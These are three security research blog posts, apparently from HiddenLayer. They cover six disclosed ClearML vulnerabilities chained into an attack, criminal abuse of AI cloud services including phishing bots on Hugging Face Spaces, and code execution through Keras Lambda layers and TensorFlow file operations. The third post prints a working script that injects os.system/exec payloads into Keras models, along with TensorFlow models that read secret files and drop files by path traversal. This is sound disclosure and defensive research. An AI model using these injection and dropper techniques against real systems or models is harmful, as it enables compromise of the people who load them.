Research | HiddenLayer

Research

min read

Machine Learning Operations: What You Need to Know Now

HiddenLayer researchers discovered six 0-day vulnerabilities in ClearML, enabling complete system compromise via exploit chains.

Following responsible disclosure practices, the vulnerabilities referenced in this blog were disclosed to ClearML before publishing. We would like to thank their team for their efforts in working with us to resolve the issues well within the 90-day window. This demonstrates that responsible disclosure allows for a good working relationship between security teams and product developers, improving the security posture throughout our community.

Collaborative Improvement - Machine Learning Operations (MLOps) Platforms

Organizations today use machine learning for an ever-increasing number of critical business functions. To build, deploy, and manage these models, data science teams have turned to Machine Learning Operations (MLOps) tooling, transforming what was once a lengthy process into an efficient and collaborative workflow.;

New technologies - and the tools that support them - are often subject to less scrutiny than their more established counterparts. Ultimately, this results in security flaws and vulnerabilities going undiscovered until an adversary or security researcher digs deep enough to discover them. This makes AI risk management an essential practice for organizations seeking to mitigate vulnerabilities across their machine learning ecosystems.

In an effort to beat the adversary to the chase, one such MLOps tool - ClearML - caught our collective eye.

Basics of ClearML

ClearML is a highly scalable MLOps platform well known for its integration capabilities with popular machine learning frameworks and tools. It comprises several components, and our team researched three of these: the SDK or client (referred to in the documentation as the Python package), the API server, and the web server.;

The server is the central hub for project management. Users interact with this via the SDK or web UI to manage their ML projects, datasets, and experiments to build and improve models. Experiments are run to test and evaluate the efficacy of models. Users can run experiments by assigning them to a queue to be picked up by an agent, essentially a worker node.

Let’s say a team of data scientists is developing a model for a specific task. The development process is tracked under a project in ClearML. Data scientists can build models and log them as part of the project, which can then be accessed, tested, evaluated, and improved on by any team member, allowing for version control and collaboration.

Over the last few months, the HiddenLayer SAI team has been researching ClearML and undergoing responsible disclosure with its creators and maintainers, Allrego.ai. During this process, our team found and disclosed six 0-day vulnerabilities across the open-source and enterprise versions of the ClearML client and server. Without further ado, let’s take a closer look at what we’ve uncovered.

The Vulns

CVE-2024-24590: Pickle Load on Artifact Get
CVE-2024-24591: Path Traversal on File Download
CVE-2024-24592: Improper Auth Leading to Arbitrary Read-Write Access
CVE-2024-24593: Cross-Site Request Forgery in ClearML Server
CVE-2024-24594: Web Server Renders User HTML Leading to XSS
CVE-2024-24595: Credentials Stored in Plaintext in MongoDB Instance

The ClearML Python Package

The ClearML Python package is used to interact with a ClearML Server instance via an API to perform management tasks, such as:

logging and sharing of models,
uploading and manipulating datasets,
running and managing experiments and projects.

Storing models and related objects for later retrieval and usage is a crucial part of any workflow for model training, evaluation, and sharing because it enables a team of people to collaborate on developing and improving the efficacy of a model on an iterative basis. ClearML allows users to do this by leveraging Python’s built-in pickle module. Pickle is a Python module often used in the field of machine learning because it makes persistent storage of models and datasets a trivial task. Despite its popularity in the field, it is inherently insecure because it can execute arbitrary code when deserialized.

You can read more about how the SAI team at HiddenLayer was previously able to leverage the pickling and unpickling process to execute ransomware by loading a model and how we have seen pickles being deployed by malicious actors in the wild.

CVE-2024-24590: Pickle Load on Artifact Get

The first vulnerability that our team found within ClearML involves the inherent insecurity of pickle files. We discovered that an attacker could create a pickle file containing arbitrary code and upload it as an artifact to a project via the API. When a user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.

https://youtu.be/8XkfNHpVLmI

CVE-2024-24591: Path Traversal on File Download

Our second vulnerability is a directory traversal inside the Datasets class within the _download_external_files method. An attacker can upload or modify a dataset containing a link pointing to a file they want to drop and the path they want to write it to on the user’s system. When a user interacts with this dataset, it triggers the download, such as when using the Dataset.squash method. The uploaded file will be written to the user’s file system at the attacker-specified location. An important note is that the external link can point to a local file by using file://, the implication being that this introduces the potential for sensitive local files to be moved to externally accessible directories.

https://youtu.be/3J-qIXzSIOo

ClearML Server

The ClearML Server is a central hub for managing projects, datasets, tasks, and more. It consists of multiple components, including an API server that users can connect to via a client to perform tasks; a web server that users can connect to via a web UI to perform tasks; a fileserver where relevant files, such as artifacts and models, are stored by default; and a MongoDB instance, that stores authentication information, among other items.

‍

CVE-2024-24592: Improper Auth Leading to Arbitrary Read-Write Access

Our third vulnerability is present in the fileserver component of the ClearML Server, which does not authenticate any requests to its endpoints, meaning an attacker can arbitrarily upload, delete, modify, or download files on the fileserver, even if the files belong to another user.

The ability to arbitrarily upload files means that the fileserver can be used to host any files, which could cause issues with space and storage but can also lead to more serious, potentially legal ramifications if the server is used to host malware or stolen or contraband data. To conduct an attack, an adversary only needs to know the address of the ClearML server, which can be obtained via a quick Shodan search (more on this later). Once they have a valid target, they can begin manipulating files on the fileserver, which, by default, is on port 8081, on the same IP address as the web server. It is important to note that when the contents of a file are modified directly in this manner, the web UI will not reflect these changes - the file size and checksum shown will remain the same. Therefore, an attacker could add malicious content to a previously verified file with no evidence of a change visible to regular users.

https://youtu.be/yBfJhBYkzdo

CVE-2024-24593: Cross-Site Request Forgery in ClearML Server

The fourth vulnerability is a Cross-Site Request Forgery (CSRF) vulnerability affecting all API endpoints. During our research, we discovered that the ClearML server has no protections against CSRF, allowing an attacker to impersonate a user by creating a malicious web page that, when visited by the victim, will send a request from their browser. By exploiting this vulnerability, an attacker can fully compromise a user’s account, enabling them to change data and settings or add themselves to projects and workspaces.

https://youtu.be/-Ndxy87xoHQ

CVE-2024-24594: Web Server Renders User HTML Leading to XSS

Our fifth vulnerability was a Cross-Site Scripting (XSS) vulnerability discovered in the web server component. Whenever users submit an artifact, they can also report samples, such as images, that are displayed under the debug samples tab. When submitting an image, a user can provide a URL rather than uploading an image. However, if the URL has the extension .html, the web server retrieves the HTML page, which is assumed to contain trusted data. The HTML is passed to the bypassSecurityTrustResourceUrl function, marking it as safe and rendering the code on the page, resulting in arbitrary JavaScript running in any user’s browser when they view the samples tab.

https://youtu.be/MMzP8hM_epA

CVE-2024-24595: Credentials Stored in Plaintext in MongoDB Instance

Our sixth vulnerability exists within the open-source version of the ClearML Server MongoDB instance, which, lacking access control, stores user information and credentials in plaintext. While the MongoDB instance is not exposed externally by default, if a malicious actor has access to the server, they could retrieve ClearML user information and credentials using a tool such as mongosh, potentially compromising other accounts owned by the user.

Full Attack Chain Scenario

At this point, we have given a brief overview of what ClearML can be used for and several seemingly disparate vulnerabilities, but can we craft a realistic attack scenario that exploits these newly discovered vulnerabilities to compromise ClearML servers and deploy malicious payloads to unsuspecting users? Let’s find out!

Identifying a Target

Using the Shodan query “http.title:clearml” and some analysis of the results, we were able to confirm that many organizations across multiple industries were using ClearML and had an externally facing server, with many of these having the fileserver exposed:

‍

Upon closer inspection of the 179 results from Shodan, we found that 19% of reachable servers had no authentication in the web UI for user accounts, meaning anybody could potentially access or manipulate sensitive components, models, and datasets hosted on these ClearML instances. There were additional instances outside of the 19% that allowed arbitrary users to register their own accounts, further increasing the attack surface for servers exposed on the Internet. While an unauthenticated attacker can abuse the exploits our team found, the staggering quantity of wide open servers shows the lack of security awareness around MLOps platforms; all this is in spite of the ClearML documentation specifically warning that additional steps are required to configure and deploy an instance securely.

Accessing a Workspace

When logging into a ClearML instance, a user can access ‘Your Work’ or ‘Team’s Work.’ While they may have access to the instance and the ability to create and manage projects, they may not be able to access the projects, datasets, tasks, and agents associated with other users.;

The arbitrary read and write vulnerability on the fileserver let us bypass the limitations of our first two vulnerabilities (CVE-2024-24590 and CVE-2024-24591), by allowing us to overwrite any arbitrary file, but the vulnerability still had some restrictions. When artifacts were stored on the fileserver, the program would create a top-level directory with the project's name. However, the child directory would be the task name concatenated with the task ID, a globally unique identifier (GUID). While an attacker could obtain the task ID for a task they could see in the front end, they would not be able to get the ID for arbitrary tasks belonging to other users and workspaces. However, as stated previously, we identified that the ClearML Server is susceptible to CSRF, opening the door for a threat actor to add a user to a workspace, as shown below.;

Firstly, we create a simple HTML page that submits a form request for the API URL:

‍

Once a legitimately authenticated user lands on this page, it will automatically redirect them to the create_invite API endpoint using the browser cookies containing the logged-in user’s credentials and invite the “pwned@hiddenlayer.com” account to their ClearML workspace.;

It’s not far-fetched to imagine a blog post entitled “Tips and Tricks to help YOU get the most out of ClearML” containing such code that threat actors could use to gain access to workspaces en masse.

Manipulating the Platform to Work for us

Now that we have access to a workspace, we can see and manipulate projects, datasets, tasks, etc., that are in legitimate use by our victim organization’s data science team in several ways.;

Firstly, we will take advantage of the Cross-Site Scripting (XSS) vulnerability to further our attack, showcasing the power of the exploit chain if abused by threat actors to propagate the payload automatically. Once an attacker has gained access to a workspace, they can upload debug samples containing the XSS payload. The payload will trigger if a legitimate user subsequently checks out the new changes to a project to view the results. The payload contains code that performs the CSRF attack to give the attacker access to additional workspaces and execute any arbitrary JavaScript supplied by the threat actor. The use of the XSS vulnerability to infect additional users means that only one user of a particular ClearML instance would need to fall prey to social engineering, while other users could simply be directed to look at a page in a trusted workspace, potentially leading to all users in an instance getting compromised.

Obtaining unfettered access to a team’s projects also means we can manipulate these to our advantage, allowing us to use the client-side vulnerabilities we found. Since our first vulnerability runs arbitrary code on a victim’s machine, we needed to craft a payload that would alert us each time a file was downloaded. As seen below, we developed a Python script that created our malicious pickle file so that upon deserialization, it sends a notification back to a server we control with information on which user was compromised, on which device and at what time:

*Figure 4: Creating a pickle object to connect back to an attacker-controlled server*

‍

*Figure 5: Uploading a pickle as an artifact to the project*

‍

When we first tried to exploit this, we realized that using the upload_artifact method, as seen in Figure 5, will wrap the location of the uploaded pickle file in another pickle. Upon discovering this, we created a script that would interface directly with the API to create a task and upload our malicious pickle in place of the file path pickle.

The exploit occurs when another user unwittingly interacts with the malicious artifact that we uploaded. To interact with an artifact, a user calls the get method within the Artifact class, which will deserialize the pickle file to find the file path where the actual file is stored. However, since a malicious pickle was uploaded rather than a file path pickle, this deserialization leads to execution of the malicious code on the end user’s computer.

In Conclusion

In this blog post, we have focused on ClearML, but there are many other MLOps platforms in use today. Companies developing these platforms provide a great and worthy service to the AI community. However, more secure development practices and better security testing must be established due to their widespread usage. This is especially important because such platforms increase the attack surface within an area of organizations where users will very likely have access to highly sensitive data, and one which will only increase in becoming a core pillar for business operations. Compromising the systems and accounts of data scientists can lead to attacks specific to AI, such as training data poisoning and exfiltration of datasets. It can also lead to attackers gaining access to GPU-powered systems, which could be leveraged to run coin miners, for example, thereby incurring high costs.

To that end, developers, data scientists, and CISOs need to understand the risks of using these platforms. As seen here, several small and seemingly disparate vulnerabilities can be used to create a complete attack chain, leading to the exploitation of end users and the compromise of AI-related systems.

Research

min read

The Use and Abuse of AI Cloud Services

AI cloud services are being hijacked for cryptomining, password cracking, and hosting malicious phishing bots.

Today, many Cloud Service Providers (CSPs) offer bespoke services designed for Artificial Intelligence solutions. These services enable you to rapidly deploy an AI asset at scale in an environment purpose-built for developing, deploying, and scaling AI systems. Some of the most popular examples include Hugging Face Spaces, Google Colab & Vertex AI, AWS SageMaker, Microsoft Azure with Databricks Model Serving, and IBM Watson. What are the advantages compared to traditional hosting? Access to vast amounts of computing power (both CPU and GPU), ready-to-go Jupyter notebooks, and scaling capabilities to suit both your needs and the demands of your model.

These AI-centric services are widely used in academic and professional settings, providing inordinate capability to the end user, often for free - to begin with. However, high-value services can become high-value targets for adversaries, especially when they’re accessible at competitive price points. To mitigate these risks, organizations should adopt a comprehensive AI security framework to safeguard against emerging threats.

Given the ease of access, incredible processing power, and pervasive use of CSPs throughout the community, we set out to understand how these systems are being used in an unintended and often undesirable manner.

Hijacking Cloud Services

It’s easy to think of the cloud as an abstract faraway concept, yet understanding the scope and scale of your cloud environments is just as (if not more!) important than protecting the endpoint you’re reading this from. These environments are subject to the same vulnerabilities, attacks, and malware that may affect your local system. A highly interconnected platform enables developers to prototype and build at scale. Yet, it’s this same interconnectivity that, if misconfigured, can expose you to massive data loss or compromise - especially in the age of AI development.

Google Colab Hijacking

In 2022, red teamer 4n7m4n detailed how malicious Colab notebooks could modify or exfiltrate data from your Google Drive if a pop-up window is agreed to. Additionally, malicious notebooks could cause you to accidentally deploy a reverse shell or something more nefarious - allowing persistent access to your Colab instance. If you’re running Colab’s from third parties, inspect the code thoroughly to ensure it isn’t attempting to access your Drive or hijack your instance.

Stealing AWS S3 Bucket Data

Amazon SageMaker provides a similar Jupyter-based environment for AI development. It can also be hijacked in a similar fashion, where a malicious notebook - or even a hijacked pre-trained model - is loaded/executed. In one of our past blogs, Insane in the Supply Chain: Threat modeling for supply chain attacks on ML systems, we demonstrate how a malicious model can enumerate, then exfiltrate all data from a connected S3 bucket, which acts as persistent cold storage for all manners of data (e.g. training data).;

Cryptominers

If you’ve tried to buy a graphics card in the last few years, you’ve undoubtedly noticed that their prices have become increasingly eye-watering - and that’s if you can find one. Before the recent AI boom, which itself drove GPU scarcity, many would buy up GPUs en-masse for use in proof-of-work blockchain mining, at a high electricity cost to boot. Energy cannot be created or destroyed - but as we’ve discovered, it can be turned into cryptocurrency.

With both mining and AI requiring access to large amounts of GPU processing power, there’s a certain degree of transferability to their base hardware environments. To this end, we’ve seen a number of individuals attempt to exploit AI hosting providers to launch their miners.

Separately, malicious packages on PyPi and NPM which aim to masquerade as and typosquat legitimate packages have been seen to deploy cryptominers within the victim environment. In a more recent spate of attacks, PyPi had to temporarily suspend the registration of new users and projects to curb the high amount of malicious activity on the platform.

While end-users should be concerned about rogue crypto mining in their environments due to exceptionally high energy bills (especially in cases of account takeover), CSPs should also be worried due to the reduced service availability, which can hamper legitimate use across their platform.;

Password Cracking

Typically, password cracking involves the use of a tool like Hydra, or John the Ripper to brute force a password or crack its hashed value. This process is computationally expensive, as the difficulty of cracking a password can get exponentially more difficult with additional length and complexity. Of course, building your own password-cracking rig can be an expensive pursuit in its own right, especially if you only have intermittent use for it. GitHub user Mxrch created Penglab to address this, which uses Google Colab to launch a high-powered password-cracking instance with preinstalled password crackers and wordlists. Colab enables fast, (initially) free access to GPUs to help write and deploy Python code in the browser, which is widely used within the ML space.;

Hosting Malware

Cloud services can also be used to host and run other types of malware. This can result not only in the degradation of service but also in legal troubles for the service provider.

Crossing the Rubika

Over the last few months, we have observed an interesting case illustrating the unintended usage of Hugging Face Spaces. A handful of Hugging Face users have abused Spaces to run crude bots for an Iranian messaging app called Rubika. Rubika, typically deployed as an Android application, was previously available on the Google Play app store until 2022, when it was removed - presumably to comply with US export restrictions and sanctions. The app is sponsored by the government of Iran and has recently been facing multiple accusations of bias and privacy breaches.

We came across over a hundred different Hugging Face Spaces hosting various Rubika bots with functionalities ranging from seemingly benign to potentially unwanted or even malicious, depending on how they are being used. Several of the bots contained functionality such as:

administering users in a group or channel,
collecting information about users, groups, and channels,
downloading/uploading files,
censoring posted content,
searching messages in groups and channels for specific words,
forwarding messages from groups and channels,
sending out mass messages to users within the Rubika social network.;

Although we don’t have enough information about their intended purpose, these bots could be utilized to spread spam, phishing, disinformation, or propaganda. Their dubiousness is additionally amplified by the fact that most of them are heavily obfuscated. The tool used for obfuscation, called PyObfuscate, allows developers to encode Python scripts in several ways, combining Python’s pseudo-compilation, Zlib compression, and Base64 encoding. It’s worth mentioning that the author of this obfuscator also developed a couple of automated phishing applications.

*Figure 1 - PyObfuscate obfuscation selection*

‍

Each obfuscated script is converted into binary code using Python’s marshal module and then subsequently executed on load using an ‘exec’ call. The marshal library allows the user to transform Python code into a pseudo-compiled format in a similar way to the pickle module. However, marshal writes bytecode for a particular Python version, whereas pickle is a more general serialization format.

*Figure 2 - Marshalled bytecode in app.py*

‍

The obfuscated scripts differ in the number and combination of Base64 and Zlib layers, but most of them have similar functionality, such as searching through channels and mass sending of messages.

“Mr. Null”

Many of the bots contain references to an ethereal character, “Mr. Null”, by way of their telegram username @mr_null_chanel. When we looked for additional context around this username, we found what appears to be his YouTube account, with guides on making Rubika bots, including a video with familiar obfuscation to the payload we’d seen earlier.

*Figure 3 - Still from an instructional YouTube video*;

‍

IRATA

Alongside the tag @mr_null_chanel, a URL https[:]//homenull[.]ir was referenced within several inspected files. As we later found out, this URL has links to an Android phishing application named IRATA and has been reported by OneCert Cyber Security as a credit card skimming site.;

After further investigation, we found an Android APK flagged by many community rules for IRATA on VirusTotal. This file communicates with Firebase, which also contains a reference to the pseudonym:

https[:]//firebaseinstallations.googleapis[.]com/v1/projects/mrnull-7b588/installations

Other domains found within the code of Rubika bots hosted on Hugging Face Spaces have also been attributed to Iranian hackers, with morfi-api[.]tk being used for a phishing attack against Bank of Iran payment portal, once again reported by OneCert Cyber Security. It’s also worth mentioning that the tag @mr_null_chanel appears alongside this URL within the bot file.

While we can’t explicitly confirm if “Mr. Null” is behind IRATA or the other phishing attacks, we can confidently assert that they are actively using Hugging Face Spaces to host bots, be it for phishing, advertising, spam, theft, or fraud.

Conclusions

Left unchecked, the platforms we use for developing AI models can be used for other purposes, such as illicit cryptocurrency mining, and can quickly rack up sky-high bills. Ensure you have a firm handle on the accounts that can deploy to these environments and that you’re adequately assessing the code, models, and packages used in them and restricting access outside of your trusted IP ranges.

The initial compromise of AI development environments is similar in nature to what we’ve seen before, just in a new form. In our previous blog Models are code: A Deep Dive into Security Risks in TensorFlow and Keras, we show how pre-trained models can execute malicious code or perform unwanted actions on machines, such as dropping malware to the filesystem or wiping it entirely.;

Interconnectivity in cloud environments can mean that you’re only a single pop-up window away from having your assets stolen or tampered with. Widely used tools such as Jupyter notebooks are susceptible to a host of misconfiguration issues, spawning security scanning tools such as Jupysec, and new vulnerabilities are being discovered daily in MLOps applications and the packages they depend on.

Lastly, if you’re going to allow cryptomining in your AI development environment, at least make sure you own the wallet it’s connected to.

Appendix

Malicious domains found in some of the Rubika bots hosted on Hugging Face Spaces:

homenull[.]ir - IRATA phishing domain
morfi-api[.]tk - Phishing attack against Bank of Iran payment portal

List of bot names and handles found across all 157 Rubika bots hosted on Hugging Face Spaces:

??????? ????????
???? ???
BeLectron
Y A S I N ; BOT
ᏚᎬᎬᏁ ᏃᎪᏁ ᎷᎪᎷᎪᎠ
@????_???
@Baner_Linkdoni_80k
@HaRi_HACK
@Matin_coder
@Mr_HaRi
@PROFESSOR_102
@Persian_PyThon
@Platiniom_2721
@Programere_PyThon_Java
@TSAW0RAT
@Turbo_Team
@YASIN_THE_GAD
@Yasin_2216
@aQa_Tayfun_CoDer
@digi_Av
@eMi_Coder
@id_shahi_13
@mrAliRahmani1
@my_channel_2221
@mylinkdooniYasin_Bot
@nezamgr
@pydroid_Tiamot
@tagh_tagh777
@yasin_2216
@zana_4u
@zana_bot_54
Arian Bot
Aryan bot
Atashgar BOT
BeL_Bot
Bifekrei
CANDY BOT
ChatCoder Bot
Created By BeLectron
CreatedByShayan
DOWNLOADER; BOT
DaRkBoT
Delvin bot
Guid Bot
OsTaD_Python
PLAT | BoT
Robot_Rubika
RubiDark
Sinzan bot
Upgraded by arian abbasi
Yasin Bot
Yasin_2221
Yasin_Bot
[SIN ZAN YASIN]
aBol AtashgarBot
arianbot
faz_sangin
mr_codaker
mr_null_chanel
my_channel_2221
ꜱᴇɴ ᴢᴀɴ ᴊᴇꜰꜰ

Research

min read

Machine Learning Models are Code

Researchers uncovered critical code execution flaws in TensorFlow and Keras models via Lambda layers and I/O operations.

Introduction

Throughout our previous blogs investigating the threats surrounding machine learning model storage formats, we’ve focused heavily on PyTorch models. Namely, how they can be abused to perform arbitrary code execution, from deploying ransomware to Cobalt Strike and Mythic C2 loaders and reverse shells and steganography. Although some of the attacks mentioned in our research blogs are known to a select few developers and security professionals, it is our intention to publicize them further, so ML practitioners can better evaluate risk and security implications during their day to day operations.

In our latest research, we decided to shift focus from PyTorch to another popular machine learning library, TensorFlow, and uncover how models saved using TensorFlow’s SavedModel format, as well as Keras’s HDF5 format, could potentially be abused by hackers. This underscores the critical importance of AI model security, as these vulnerabilities can open pathways for attackers to compromise systems.

Keras

Keras is a hugely popular machine learning framework developed using Python, which runs atop the TensorFlow machine learning platform and provides a high-level API to facilitate constructing, training, and saving models. Pre-trained models developed using Keras can be saved in a format called HDF5 (Hierarchical Data Format version 5), that “supports large, complex, heterogeneous data” and is used to serialize the layers, weights, and biases for a neural network. The HDF5 storage format is well-developed and relatively secure, being overseen by the HDF Group, with a large user base encompassing industry and scientific research.;

We therefore started wondering if it would be possible to perform arbitrary code execution via Keras models saved using the HDF5 format, in much the same way as for PyTorch?

Security researchers have discovered vulnerabilities that may be leveraged to perform code execution via HDF5 files. For example, Talos published a report in August 2022 highlighting weaknesses in the HDF5 GIF image file parser leading to three CVEs. However, while looking through the Keras code, we discovered an easier route to performing code injection in the form of a Keras API that allows a “Lambda layer” to be added to a model.

Code Execution via Lambda

The Keras documentation on Lambda layers states:

The Lambda layer exists so that arbitrary expressions can be used as a Layer when constructing Sequential and Functional API models. Lambda layers are best suited for simple operations or quick experimentation.

Keras Lambda layers have the following prototype, which allows for a Python function/lambda to be specified as input, as well as any required arguments:

tf.keras.layers.Lambda(

;;;;function, output_shape=None, mask=None, arguments=None, **kwargs

)

Delving deeper into the Keras library to determine how Lambda layers are serialized when saving a model, we noticed that the underlying code is using Python’s marshal.dumps to serialize the Python code supplied using the function parameter to tf.keras.layers.Lambda. When loading an HDF5 model with a Lambda layer, the Python code is deserialized using marshal.loads, which decodes the Python code byte-stream (essentially like the contents of a .pyc file) and is subsequently executed.

Much like the pickle module, the marshal module also contains a big red warning about usage with untrusted input:

In a similar vein to our previous Pickle code injection PoC, we’ve developed a simple script that can be used to inject Lambda layers into an existing Keras/HDF5 model:

"""Inject a Keras Lambda function into an HDF5 model"""
import os
import argparse
import shutil
from pathlib import Path
import tensorflow as tf

parser = argparse.ArgumentParser(description="Keras Lambda Code Injection")
parser.add_argument("path", type=Path)
parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])
parser.add_argument("args")
parser.add_argument("-v", "--verbose", help="verbose logging", action="count")

args = parser.parse_args()
command_args = args.args

if os.path.isfile(command_args):
    with open(command_args, "r") as in_file:
        command_args = in_file.read()

def Exec(dummy, command_args):
    if "keras_lambda_inject" not in globals():
        exec(command_args)

def Eval(dummy, command_args):
    if "keras_lambda_inject" not in globals():
        eval(command_args)

def System(dummy, command_args):
    if "keras_lambda_inject" not in globals():
        import os
        os.system(command_args)

def Runpy(dummy, command_args):
    if "keras_lambda_inject" not in globals():
        import runpy
        runpy._run_code(command_args,{})
        
# Construct payload
if args.command == "system":
    payload = tf.keras.layers.Lambda(System, name=args.command, arguments={"command_args":command_args})
elif args.command == "exec":
    payload = tf.keras.layers.Lambda(Exec, name=args.command, arguments={"command_args":command_args})
elif args.command == "eval":
    payload = tf.keras.layers.Lambda(Eval, name=args.command, arguments={"command_args":command_args})
elif args.command == "runpy":
    payload = tf.keras.layers.Lambda(Runpy, name=args.command, arguments={"command_args":command_args})

# Save a backup of the model
backup_path = "{}.bak".format(args.path)
shutil.copyfile(args.path, backup_path)

# Insert the Lambda payload into the model
hdf5_model = tf.keras.models.load_model(args.path)
hdf5_model.add(payload)
hdf5_model.save(args.path)

keras_inject.py

The above script allows for payloads to be inserted into a Lambda layer that will execute code or commands via os.system, exec, eval, or runpy._run_code. As a quick demonstration, let’s use exec to print out a message when a model is loaded:

> python keras_inject.py model.h5 exec "print('This model has been hijacked!')"

To execute the payload, simply loading the model is sufficient:

> python>>> import tensorflow as tf>>> tf.keras.models.load_model("model.h5")This model has been hijacked!

Success!

Whilst researching this code execution method, we discovered a Keras HDF5 model containing a Lambda function that was uploaded to VirusTotal on Christmas day 2022 from a user in Russia who was not logged in. Looking into the structure of the model file, named exploit.h5, we can observe the Lambda function encoded using base64:

{
   "class_name":"Lambda",
   "config":{
      "name":"lambda",
      "trainable":true,
      "dtype":"float32",
      "function":{
         "class_name":"__tuple__",
         "items":[
            "4wEAAAAAAAAAAQAAAAQAAAATAAAAcwwAAAB0AHwAiACIAYMDUwApAU4pAdoOX2ZpeGVkX3BhZGRp\nbmcpAdoBeCkC2gtrZXJuZWxfc2l6ZdoEcmF0ZakA+m5DOi9Vc2Vycy90YW5qZS9BcHBEYXRhL1Jv\nYW1pbmcvUHl0aG9uL1B5dGhvbjM3L3NpdGUtcGFja2FnZXMvb2JqZWN0X2RldGVjdGlvbi9tb2Rl\nbHMva2VyYXNfbW9kZWxzL3Jlc25ldF92MS5wedoIPGxhbWJkYT5lAAAA8wAAAAA=\n",
            null,
            {
               "class_name":"__tuple__",
               "items":[
                  7,
                  1
               ]

‍‍

After decoding the base64 and using marshal.loads to decode the compiled Python, we can use dis.dis to disassemble the object and dis.show_code to display further information:

28           0 LOAD_CONST               1 (0)              2 LOAD_CONST               0 (None)              4 IMPORT_NAME              0 (os)              6 STORE_FAST               1 (os)
 29           8 LOAD_GLOBAL              1 (print)             10 LOAD_CONST               2 (‘INFECTED’)             12 CALL_FUNCTION            1             14 POP_TOP
 30          16 LOAD_FAST                0 (x)             18 RETURN_VALUE

Output from dis.dis()

Name:              exploitFilename:          infected.pyArgument count:    1Positional-only arguments: 0Kw-only arguments: 0Number of locals:  2Stack size:        2Flags:             OPTIMIZED, NEWLOCALS, NOFREEConstants:   0: None   1: 0   2: ‘INFECTED’Names:   0: os   1: printVariable names:   0: x   1: os

Output from dis.show_code()

The above payload simply prints the string “INFECTED” before returning and is clearly intended to test the mechanism, and likely uploaded to VirusTotal by a researcher to test the detection efficacy of anti-virus products.

It is worth noting that since December 2022, code has been added to Keras to prevent loading Lambda functions if not running in “safe mode,” but this method still works in the latest release, version 2.11.0, from 8 November 2022, as of the date of publication.

TensorFlow

Next, we delved deeper into the TensorFlow library to see if it might use pickle, marshal, exec, or any other generally unsafe Python functionality.;

At this point, it is worth discussing the modes in which TensorFlow can operate; eager mode and graph mode.

When running in eager mode, TensorFlow will execute operations immediately, as they are called, in a similar fashion to running Python code. This makes it easier to experiment and debug code, as results are computed immediately. Eager mode is useful for experimentation, learning, and understanding TensorFlow's operations and APIs.

Graph mode, on the other hand, is a mode of operation whereby operations are not executed straight away but instead are added to a computational graph. The graph represents the sequence of operations to be executed and can be optimized for speed and efficiency. Once a graph is constructed, it can be run on one or more devices, such as CPUs or GPUs, to execute the operations. Graph mode is typically used for production deployment, as it can achieve better performance than eager mode for complex models and large datasets.

With this in mind, any form of attack is best focused against graph mode, as not all code and operations used in eager mode can be stored in a TensorFlow model, and the resulting computation graph may be shared with other people to use in their own training scenarios.

Under the hood, TensorFlow models are stored using the “SavedModel” format, which uses Google’s Protocol Buffers to store the data associated with the model, as well as the computational graph. A SavedModel provides a portable, platform-independent means of executing the “graph” outside of a Python environment (language agnostically). While it is possible to use a TensorFlow operation that executes Python code, such as tf.py_function, this operation will not persist to the SavedModel, and only works in the same address space as the Python program that invokes it when running in eager mode.

So whilst it isn’t possible to execute arbitrary Python code directly from a “SavedModel” when operating in graph mode, the SECURITY.md file encouraged us to probe further:

TensorFlow models are programs
TensorFlow models (to use a term commonly used by machine learning practitioners) are expressed as programs that TensorFlow executes. TensorFlow programs are encoded as computation graphs. The model's parameters are often stored separately in checkpoints.
At runtime, TensorFlow executes the computation graph using the parameters provided. Note that the behavior of the computation graph may change depending on the parameters provided. TensorFlow itself is not a sandbox. When executing the computation graph, TensorFlow may read and write files, send and receive data over the network, and even spawn additional processes. All these tasks are performed with the permission of the TensorFlow process. Allowing for this flexibility makes for a powerful machine learning platform, but it has security implications.

The part about reading/writing files immediately got our attention, so we started to explore the underlying storage mechanisms and TensorFlow operations more closely.;

As it transpires, TensorFlow provides a feature-rich set of operations for working with models, layers, tensors, images, strings, and even file I/O that can be executed via a graph when running a SavedModel. We started speculating as to how an adversary might abuse these mechanisms to perform real-world attacks, such as code execution and data exfiltration, and decided to test some approaches.

Exfiltration via ReadFile

First up was tf.io.read_file, a simple I/O operation that allows the caller to read the contents of a file into a tensor. Could this be used for data exfiltration?

As a very simple test, using a tf.function that gets compiled into the network graph (and therefore persists to the graph within a SavedModel), we crafted a module that would read a file, secret.txt, from the file system and return it:

lass ExfilModel(tf.Module):
  @tf.function
  def __call__(self, input):
    return tf.io.read_file("secret.txt")


model = ExfilModel()

When the model is saved using the SavedModel format, we can use the “saved_model_cli” to load and run the model with input:

> saved_model_cli run –dir .\tf2-exfil\ –signature_def serving_default –tag_set serve –input_exprs “input=1″Result for output key output:b’Super secret!

This yields our “Super secret!” message from secret.txt, but it isn’t very practical. Not all inference APIs will return tensors, and we may only receive a prediction class from certain models, so we cannot always return full file contents.

However, it is possible to use other operations, such as tf.strings.substr or tf.slice to extract a portion of a string/tensor, and leak it byte by byte in response to certain inputs. We have crafted a model to do just that based on a popular computer vision model architecture, which will exfil data in response to specific image files, although this is left as an exercise to the reader!;;

Code Execution via WriteFile

Next up, we investigated tf.io.write_file, another simple I/O operation that allows the caller to write data to a file. While initially intended for string scalars stored in tensors, it is trivial to pass binary strings to the function, and even more helpful that it can be combined with tf.io.decode_base64 to decode base64 encoded data.

class DropperModel(tf.Module):
  @tf.function
  def __call__(self, input):
    tf.io.write_file("dropped.txt", tf.io.decode_base64("SGVsbG8h"))
    return input + 2


model = DropperModel()

‍‍If we save this model as a TensorFlow SavedModel, and again load and run it using “saved_model_cli”, we will end up with a file on the filesystem called “dropped.txt” containing the message “Hello!”.

Things start to get interesting when you factor in directory traversal (somewhat akin to the Zip Slip Vulnerability). In theory (although you would never run TensorFlow as root, right?!), it would be possible to overwrite existing files on the filesystem, such as SSH authorized_keys, or compiled programs or scripts:

class DropperModel(tf.Module):
  @tf.function
  def __call__(self, input):
    tf.io.write_file("../../bad.sh", tf.io.decode_base64("ZWNobyBwd25k"))
    return input + 2


model = DropperModel()

For a targeted attack, having the ability to conduct arbitrary file writes can be a powerful means of performing an initial compromise or in certain scenarios privilege escalation.

Directory Traversal via MatchingFiles

We also uncovered the tf.io.matching_files operation, which operates much like the glob function in Python, allowing the caller to obtain a listing of files within a directory. The matching files operation supports wildcards, and when combined with the read and write file operations, it can be used to make attacks performing data exfiltration or dropping files on the file system more powerful.

